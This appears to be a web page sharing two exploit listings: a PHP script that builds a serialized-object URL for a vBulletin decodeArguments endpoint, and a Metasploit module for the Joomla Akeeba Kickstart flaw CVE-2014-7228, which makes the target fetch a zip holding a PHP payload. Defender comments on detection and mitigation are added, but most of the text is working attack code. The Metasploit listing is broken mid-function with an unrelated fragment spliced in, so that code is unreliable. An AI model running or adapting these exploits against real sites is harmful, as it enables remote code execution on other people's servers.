
EcHoLL


  1. <?php
     /*
      * Command-line script that prints a URL for the path
      * /ajax/api/hook/decodeArguments on the host given as the first argument.
      * The `arguments` query parameter carries a URL-encoded, PHP-serialized
      * vB_dB_Result object built from the two stub classes below.
      *
      * NOTE(review): the endpoint name suggests the server passes `arguments`
      * to unserialize(); that code is not shown here, so treat it as an
      * assumption to confirm against the application source.
      *
      * Defender notes:
      *  - Detection: the serialized object starts with O:12:"vB_dB_Result", so
      *    the URL-encoded parameter value starts with
      *    O%3A12%3A%22vB_dB_Result%22. Requests to the path above carrying
      *    that prefix in access logs or WAF telemetry are worth alerting on.
      *  - Mitigation: never hand request data to unserialize(). Use a
      *    data-only format such as JSON, or on PHP 7+ call
      *    unserialize($data, ['allowed_classes' => false]). Apply the vendor
      *    fix for the affected application.
      */

     // Usage guard: both a target host and a payload argument are required.
     if ($argc < 3) {
         print 'php ' . $argv[0] . ' <target> <payload>';
         die();
     }

     // Stub that only reproduces the class name and the public `functions`
     // property, so the serialized form names the same class and property.
     class vB_Database {
         public $functions = array();

         public function __construct() {
             // Fills the 'free_result' slot from $argv[2], exactly as written.
             // NOTE(review): presumably the server-side class of the same name
             // treats this entry as a function name to call. Not shown here.
             $this->functions['free_result'] = $argv[2];
         }
     }

     // Stub for the outer object. Its protected properties are what ends up
     // in the serialized stream: a nested vB_Database and a recordset value.
     class vB_dB_Result {
         protected $db;
         protected $recordset;

         public function __construct() {
             $this->db = new vB_Database();
             // Truthy placeholder. Why the value is 1 is not visible here.
             $this->recordset = 1;
         }
     }

     // serialize() emits the object graph and urlencode() makes it safe to
     // place in a query string.
     $x = urlencode(serialize(new vB_dB_Result()));

     // Output only: the script prints the URL and sends no request itself.
     print 'http://' . $argv[1] . '/ajax/api/hook/decodeArguments?arguments=' . $x;
     ?>
  2. ##
     # This module requires Metasploit: http//metasploit.com/download
     # Current source: https://github.com/rapid7/metasploit-framework
     ##

     # Reviewer summary (defender's view):
     #  - Per its own metadata, this module targets CVE-2014-7228, a PHP
     #    object-injection issue in the Akeeba restoration component shipped
     #    with Joomla! for updates. The Description says it is exploitable
     #    only while a Joomla! update is in progress.
     #  - Detection: requests to
     #    administrator/components/com_joomlaupdate/restoration.php outside a
     #    planned update, and the web server itself fetching a .zip from an
     #    unfamiliar host. `kickstart.setup.sourcefile` below is set to a
     #    remote URL.
     #  - Mitigation: upgrade past the affected versions listed in the
     #    Description and follow the vendor advisories under 'References'.
     #    Blocking outbound HTTP from the web tier limits the remote-archive
     #    step.
     #  - NOTE(review): the listing on this page is truncated inside `primer`
     #    (see the marker there), so the module does not parse as shown.

     require 'msf/core'
     require 'rex/zip'
     require 'json'

     class Metasploit3 < Msf::Exploit::Remote
       Rank = ExcellentRanking

       # HttpClient sends requests to the target. HttpServer::HTML lets the
       # module serve content itself (the zip archive built in `primer`).
       include Msf::Exploit::Remote::HttpClient
       include Msf::Exploit::Remote::HttpServer::HTML
       include Msf::Exploit::FileDropper

       # Registers the module metadata (name, description, references, target)
       # and two options: TARGETURI (required, default '/joomla') and
       # HTTPDELAY (optional, default 5 seconds).
       def initialize(info={})
         super(update_info(info,
           'Name' => "Joomla Akeeba Kickstart Unserialize Remote Code Execution",
           'Description' => %q{ This module exploits a vulnerability found in Joomla! through 2.5.25, 3.2.5 and earlier 3.x versions and 3.3.0 through 3.3.4 versions. The vulnerability affects the Akeeba component, which is responsible for Joomla! updates. Nevertheless it is worth to note that this vulnerability is only exploitable during the update of the Joomla! CMS. },
           'License' => MSF_LICENSE,
           'Author' => [
             'Johannes Dahse', # Vulnerability discovery
             'us3r777 <us3r777[at]n0b0.so>' # Metasploit module
           ],
           'References' => [
             [ 'CVE', '2014-7228' ],
             [ 'URL', 'http://developer.joomla.org/security/595-20140903-core-remote-file-inclusion.html'],
             [ 'URL', 'https://www.akeebabackup.com/home/news/1605-security-update-sep-2014.html'],
             [ 'URL', 'http://websec.wordpress.com/2014/10/05/joomla-3-3-4-akeeba-kickstart-remote-code-execution-cve-2014-7228/'],
           ],
           'Platform' => ['php'],
           'Arch' => ARCH_PHP,
           'Targets' => [
             [ 'Joomla < 2.5.25 / Joomla 3.x < 3.2.5 / Joomla 3.3.0 < 3.3.4', {} ]
           ],
           'Stance' => Msf::Exploit::Stance::Aggressive,
           'Privileged' => false,
           'DisclosureDate' => "Sep 29 2014",
           'DefaultTarget' => 0))

         register_options(
           [
             OptString.new('TARGETURI', [true, 'The base path to Joomla', '/joomla']),
             OptInt.new('HTTPDELAY', [false, 'Seconds to wait before terminating web server', 5])
           ], self.class)
       end

       # Presence check only: requests restoration.php under the Joomla base
       # path and reports Detected on HTTP 200, otherwise Safe. It does not
       # test whether the endpoint is vulnerable or whether an update is
       # running.
       def check
         res = send_request_cgi(
           'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restoration.php')
         )

         if res && res.code == 200
           return Exploit::CheckCode::Detected
         end

         Exploit::CheckCode::Safe
       end

       # Prepares the material this module serves and sends. Only the
       # preparation steps survive in this listing.
       def primer
         # URL of a randomly named .zip under this module's own HTTP server.
         srv_uri = "#{get_uri}/#{rand_text_alpha(4 + rand(3))}.zip"

         # PHP-serialized AKFactory object: an empty kickstart.security.password
         # and kickstart.setup.sourcefile pointing at srv_uri. The "\x00" bytes
         # are how PHP marks a private property name in the serialized form.
         php_serialized_akfactory = 'O:9:"AKFactory":1:{s:18:"' + "\x00" + 'AKFactory' + "\x00" + 'varlist";a:2:{s:27:"kickstart.security.password";s:0:"";s:26:"kickstart.setup.sourcefile";s:' + srv_uri.length.to_s + ':"' + srv_uri + '";}}'

         # Random file name for the PHP file placed in the archive.
         php_filename = rand_text_alpha(8 + rand(8)) + '.php'

         # Create the zip archive
         print_status("Creating archive with file #{php_filename}")
         zip_file = Rex::Zip::Archive.new
         zip_file.add_file(php_filename, payload.encoded)

         # NOTE(review): the page drops text here. What follows is the tail of
         # a different statement: a response carrying @zip with a zip content
         # type, then a "not found" reply. The code between add_file and this
         # fragment is missing from the listing.
         @zip, { 'Content-Type' => 'application/zip' })
           return
         end

         print_status("Sending not found...")
         send_not_found(cli)
       end
     end

     exploit perl or python editions?